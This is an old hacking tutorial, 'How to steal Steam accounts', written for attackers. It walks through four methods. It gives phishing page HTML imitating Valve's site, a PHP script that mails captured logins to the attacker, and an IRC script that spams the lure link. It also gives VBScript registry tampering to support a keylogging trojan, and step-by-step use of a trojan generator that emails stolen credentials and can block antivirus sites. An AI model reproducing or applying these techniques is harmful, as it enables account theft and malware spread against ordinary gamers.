|| Author: sk0r,Czybik/EOF || Back to articles || ||How to ||steal ||Steam accounts ||______________________________________ ------------------------------------------ +-----------------------------------------+ |1: What is Steam? |+ |2: First way: PHISHING |+ |3: Second way: KEYLOGGING |+ |4: Third way: CLIENTREGISTRY.BLOB |+ |5: Fourth way: ASTGEN VCK V1.1 |+ +-----------------------------------------++ +++++++++++++++++++++++++++++++++++++++++++ ================= |1: What is Steam?| ================= The Steam client is a program to play several online games, like Counter-Strike 1.6, Half-Life, Half-Life 2, Counter-Strike: Source, Day of Defeat and more... Because you can play every game being activated with the users account it became quite popular to steal such accounts. Steam has no security features to avoid such things, only the ClientRegistry.blob is encrypted. The moment you get access to the account data you can change things like Email, password and the security question and that's it, the account is yours. ====================== |2: First way: PHISHING| ====================== The easiest way to get access to Steam accounts is via Phishing. This method is based on Social Engineering techniques, this means, that you trick the user and make him believe for example the fake page is true. Phishing is used with Emails and HTML-Files, let's look at some normal example: Mr.X gets some Email, which seems to be from eBay, in this Email he is asked to login to his account to update his account data. The site he is going to visit looks exactly like the one of eBay, so the user thinks all is okay and types in his account information, without recognizing the false URL. And that's it, now his informations are send to someone else. That's the way Phisher are working, I'll show you this now. Now make a HTML-File with the following code: +------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+ | | | | | | | | | | | Steam Account Validation | | | | | | | | | | | | | | | | | | | | | | | | | |
| |[Steam] | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | |
| | | | | | | |
| |

Account validation

| |

Please, shortly, verify your account to play secure.


| |
| |Dear Steam Subscriber,
| |Because of the Hacking and Cheating in Steam Games Valve wants
| |you to verify your account with your Cd-Key on the Steam servers.
| |This is necessary because we must be sure that you own a legal
| |buyed steam account. Please input your account data and click
| |'Loging'. Then you will receive an email a few minutes later. This
| |email contain the result of the validation. If your result is positive,
| |you can play again.
| |
| | | |
| | | | | | | | | | | | | | | | |
| |
| | Accountname:

Password: | |


| |
| |

| |
| | | |
| | | | | | | |
| | | | | | | | | | | | | |
© 2006 Valve Corporation. All rights reserved. Valve, the Valve logo, Half-Life, the Half-Life logo, the Lambda logo, Steam, the Steam logo, | | Team Fortress, the Team Fortress logo, Opposing Force, Day of Defeat, the Day of Defeat logo, Counter-Strike, the Counter-Strike logo, Source, the Source logo and Counter-Strike: | | Condition Zero are trademarks and/or registered trademarks of Valve Corporation. Privacy Policy. Legal. | | Steam Subscriber Agreement.
| |
| | | | | | | | | | | | | | | | | | | +------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+ Save this document and look how similar it is to the style of Valves homepage. The good thing about phishing is, that you can copy the source code of the site you want to fake (Look at this example). Now you need a PHP-Script, which will take in the date typed by the user and send it via Mail() function to your Email, for example: +-------------------------------------------------------------------------------------------------------------------------------------------------+ | | |back to the form"; | |} | |else { | | mail("yourmail@isp.com", "Steam Account pishing", "Accountname: $email"." | "."Accountpasswort: $password"." | ", $Header); | | echo "

Error 404



"; | | echo "The page could not be found
"; | | echo "

"; | | echo "

Hacked by sk0r / Czybik

"; | |} | |?> | | | +-------------------------------------------------------------------------------------------------------------------------------------------------+ This script will send you the account name and password, be sure to take a server, which is able to do this. Make sure the user is no recognizing it, otherwise he/she could change his account data before you receive the information. When you are finished with the HTML-File and the PHP-Script, load them up to a server and spread the link to it, for example via Email or IRC, I like Email most of course. To spread via IRC you could do a script that will message a user, when he joins the channel you are in, this could look like this: +--------------------------------------------------------------------------------------------------------------------------------------------+ | | |On *:Join:#: { | | /unset %vic | | /unset %msg | | set %vic = $nick | | set %msg = Every steam user is asked to verify his account information --> http://www.steampowered.de.ms | | If (%vic != $me) { halt} | | /amsg %vic %msg | |} | | | +--------------------------------------------------------------------------------------------------------------------------------------------+ An Email would be much better of course, maybe with a faked sender, too. Using a HTML-Email is the best way to trick a user, it looks most realistic and similar to the original one and be sure if the user believes what he sees in the Email he will fill out the form on your page. Style, text and grammar are most important, if you have mistakes in the text and the style is different to the original one then the user will not believe it and it does not matter how good the text might be. You could send the Email to specific people, that have an account, about 25 names should be enough. You could also make a Spam-Bot searching through the internet for Emails, which are in a relation to Steam, that would be an even more professional way to start stealing accounts. ========================= |3: Second way: KEYLOGGING| ========================= A favoured way to get the users data is by getting him to execute a trojan horse, that will do some keylogging and send the data back to your Email. Steam has the feature to automatically login, so you first have to modify Steam that the user is forced to type in his password all time, when he wants to play. There are two possible ways to do this. The first would be to delete the ClientRegistry.blob file in the Steam directory, this will force the user to login with his password, the litte disadvantage is, that this file contains several other information and when deleted Steam has to update. That's why I don't recommend this one. The file can be find under: +---------------------------------------------------------+ | | |%installfolder%\Steam\ClientRegistry.blob | |%installfolder%\Valve\Steam\ClientRegistry.blob | | | +---------------------------------------------------------+ You can easily get the path via Registry: +----------------------------------------------------------------------+ | | |HKEY_LOCAL_MACHINE\SOFTWARE\Valve\Steam\InstallPath | | | +----------------------------------------------------------------------+ This one you can save to a variable and append the name (example in VB-Script): +----------------------------------------------------------------------------------------------------+ | | |Set wshs = CreateObject("WScript.Shell") | |CheckSteam = wshs.regread("HKEY_LOCAL_MACHINE\SOFTWARE\Valve\Steam\" & "InstallPath") | |If CheckSteam <>"" Then | |ClientRegistry = CheckSteam + "\ClientRegistry.blob" | |End If | | | +----------------------------------------------------------------------------------------------------+ Now to the second way, the better one. You write a Registry value in the Steam key, forcing the user to log in every time he wants to access the games and it is recommended to stop Steam from automatically starting, it's better for the trojan horse: +-------------------------------------------------------------------------------------------------+ | | |Set wshs = CreateObject("WScript.Shell") | |wshs.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Steam", "" | |wshs.regwrite "HKEY_CURRENT_USER\Software\Valve\Steam\RefreshLoginRequired", 1, "REG_DWORD" | | | +-------------------------------------------------------------------------------------------------+ Make sure that "RefreshLoginRequired is a REG_DWORD value. We're almost done with that. Now we should do some IF-Function, which will start the keylogging function, when Steam is active. Always overwrite those two Registry keys to make sure the user is not changing it manually while setting options in Steam. Now we have the password, but the user name is missing, but that is easy, Steam is creating one folder, named exactly like the users account name in the Steam directory, here some example code in VB-Script: +-------------------------------------------------------------------+ | | |Set fso = CreateObject("Scripting.FileSystemObject") | |SteamApps = CheckSteam + "\SteamApps" | |Set GetNameFolders = fso.GetFolder (SteamApps) | |For Each Ordner in GetNameFolders | |Accountname = Accountname + Ordner.name + Vbcrlf | |Next | | | +-------------------------------------------------------------------+ Now we have account name and password. Now go on coding a trojan horse with the information i gave you, I recommend VB for this, its easy to code a such a program with it. The data could be send via PHP-Script or SMTP-Engine. For an example look at the source code of Win32.KillAvSteam. ================================= |4: Third way: CLIENTREGISTRY.BLOB| ================================= This is definitely the hardest way to get the users account data. The "ClientRegistry.blob" is an encrypted file, which is containing several options of Steam, account name and password, too. It is possible to get those information via this file, but until now it has not been tried or done. There are some tools out there, but they don't work well and just show up false informations. To get the informations with this technique you must know much more about the structure of this file. It seems to be a binary file, that would need to be converted first. It is also not known how the name and password are stored, as strin, as keycode, as encrypted string, which algorithm? All the question are not answered, yet. To answer them you must work for Valve or spend much time analyzing the file, you must have good knowledge in a high level language. If you are able to do all this, you can try writing a trojan horse doing all this and decrypting/converting the file to get the name and password. If you are at this point, just make a SMTP-Engine to send the information via Email to yourself, its possible... ============================== |5: Fourth way: ASTGEN VCK V1.1| ============================== This is the most easy way to steal the account information of someone else. With the Advanced Steam Trojan Generator v1.1 (Astgen1.1) you can create trojan horses source code, setting several specific options. The created program has a keylogging function and sends the information via a Email using a PHP-Script, which is generated automatically, too. The source code is generated in Visual Basic, to compile it you need the file MS Visual Basic 6.0. I will explain now how to use this kit. First load the trojan from my site under "Tools". When you are finished loading, execute the file "Astgen1.1.exe", important to do: In the field "Deine Emailadresse" you have to type your own Email address, the collected information will be send there. In the field "Link zum PHP-Skript" you have to type in the link to the PHP-Script file, containing the form data (The generator creates two PHP-Scripts, one as a form, where the data is put into and another one sending the data via Mail() function). In the "Form options" section fill out everything but make sure that the "Formname" is not identical with the "Processname". In the section Registry you can choose how the trojan horse should work, I recommend "Use RefreshLoginRequired" because the other one is deleting the "ClienRegistry.blob" again and again, forcing Steam to update all the time. This could irritate the user quite fast and is looking really suspicious. You can also decide whether you want to set the Registry values for hiding files and file extensions. In the section "Application" you can set the location, where the program shall copy to, when executed the first time ("Make backup to"). Under "Keylogg times(minutes)" you must decide how many minutes the program shall log data. Then you have to decide whether the trojan horse shall start logging since system start or when the "Steam.exe" gets executed, I recommend the second one. Then you have to set the number telling the program how often to log information, when this number is reached it will stop sending information to you or logging anything. If you like you can set an option, which will result in the deletion of important Steam files, when this number is reached (When the trojan horse has done its job), this will force the user to reinstall Steam. You could also display some message, text, title and icon can be set by you. Last, but not least you can decided whether the program shall block important CS and AV sites or not. Now click on "Generieren" and a new folder will be created, named "Trojan-Source", it contains four files: "Form-Source.php", which was set by the "Link" option, the "phpemail.php" file, this is the script sending you all files via Email, the "SteamAccTrojan.frm" file containing the source code and the "Project1.vbp" file, this is a project file, containing information about the Form file. Now open the file "Project1.vbp", wait until everything is loaded and go to the left, "File"-> "Make Valve Patch - Steam.exe", a window will pop up asking for the location to save the final executable file. Your trojan horse shpould be ready now. If there was any error while compiling related to the source code, please write an Email to me with an error description, so I can fix it soon. Be creative, you could phishing in combination with the trojan horse for example and go on spreading your trojan now. To use "Astgen1.1" you must accept the disclaimer. Now load up the .php files to your webserver, they must be in the same directory, the "Form-Source.php" must be accessable exactly the way you typed it into the "PHP-Skript" field.